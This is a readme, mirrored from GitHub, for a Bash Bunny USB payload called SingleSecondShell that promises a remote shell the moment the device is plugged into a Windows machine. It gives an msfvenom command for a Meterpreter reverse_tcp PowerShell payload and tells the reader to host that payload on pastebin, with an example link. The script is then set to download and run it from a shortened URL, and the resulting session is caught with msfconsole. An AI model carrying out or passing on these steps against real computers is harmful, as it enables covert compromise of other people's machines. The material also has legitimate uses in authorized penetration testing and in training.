hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/SingleSecondShell/readme.md
0xCoto 741b4a67e5 Added SingleSecondShell payload (#115) 
* Add files via upload

* Update readme.md
2017-04-07 15:45:09 +10:00

40 lines
2.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# SingleSecondShell
Author: [@0xCoto](https://github.com/0xCoto)
Version: Version 1.0
## Description
Plug in the bash bunny, get a shell. Instantly.
The <1 Second ReverseShell Payload is going to run blazing fast on the Bash Bunny, and cannot work on any other BadUSB devices, such as the USB Rubber Ducky that quick. That is obviously the reason this Payload is dedicated and specifically developed for the Bash Bunny. Plug in, and before you know it, you've got a shell. How awesome is that?
## Configuration
#### Generating Payload
In order to generate your reverse_tcp Payload, you need to run the following command on your Kali machine (unless you have msfvenom installed on another OS): ```msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f psh-cmd smallest```
Make sure to replace `YOUR_IP` with your local/public IP Address (depending on the type of attack you are looking to perform) and `YOUR_PORT` with the port that you've forwarded (if you are performing a public attack, outside your network).
When the payload is generated, remove everything up to `powershell.exe` and upload it to pastebin. Here's my example: http://pastebin.com/raw/DJbS5mTj
#### Shortening the URL
As you can see, we have a pretty long URL. So, in order to shorten the URL and reduce the amount of keystrokes, therefore attacking time, we are going to be using a URL shortening service, such as https://goo.gl/.
#### Completeing the script
That's it. Now just replace the `$u='YOUR_LINK'` with your new URL. For example: `$u='goo.gl/8ggZD1'`
Note: You do not need to include `http(s)://` in your URL, so you can go ahead and get rid of that too to reduce keystrokes and speedup the keystroke injection.
## Listening to Connections
Listening to connections is pretty straightforward, but I'm not going to cover it in detail in this tutorial. All you need to do is use a listener software, CLI or GUI, such as `msfconsole` or `Armitage`, both of which can be setup to work with each other very easily.
## Bash Bunny Status
| LED | Status |
| ---------------- | ------------------------------------- |
| Red | Failed to open script file |
| Amber | Script Running |
| Green | Finished |
Reference in New Issue View Git Blame Copy Permalink